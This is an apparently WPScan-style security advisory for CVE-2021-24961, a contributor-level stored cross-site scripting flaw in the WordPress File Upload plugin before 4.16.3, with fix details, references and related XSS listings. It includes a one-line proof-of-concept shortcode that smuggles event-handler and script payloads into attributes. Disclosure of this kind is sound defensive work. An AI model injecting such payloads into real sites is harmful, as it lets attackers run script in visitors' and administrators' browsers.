WordPress File Upload < 4.16.3 – Contributor+ Stored Cross-Site Scripting via Shortcode | CVE 2021-24961 | Plugin Vulnerabilities

Description

The plugin does not escape some of its shortcode argument, which could allow users with a role as low as Contributor to perform Cross-Site Scripting attacks

Proof of Concept

[wordpress_file_upload widths='title:1;animation-name&colon;twentytwentyone-close-button-transition" onanimationend="alert(/XSS-widths/)' resetmode='"+alert(/XSS-restmode/)&&"']

Affects Plugins

Fixed in 4.16.3

wordpress-file-upload-pro

Fixed in 4.16.3

References

CVE

URL

https://plugins.trac.wordpress.org/changeset/2677722

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID

c911bbbd-0196-4e3d-ada3-4efb8a339954

Timeline

Publicly Published

2022-02-14 (about 2 years ago)

Added

2022-02-14 (about 2 years ago)

Last Updated

2022-04-08 (about 2 years ago)

Other

Published

Title

Published

2019-06-18

Title

Seo by Rank Math <= 1.0.26 - XSS Issues

Published

2020-09-06

Title

Constant Contact Forms < 1.8.8 - Multiple Authenticated Stored XSS

Published

2023-09-27

Title

RSVPMarker < 10.6.7 - Admin+ Stored XSS

Published

2014-08-01

Title

BuddyPress Extended Friendship Request - wp-admin/admin-ajax.php friendship_request_message Parameter XSS

Published

2015-02-02

Title

WordPress Calls to Action <= 2.2.7 - Stored XSS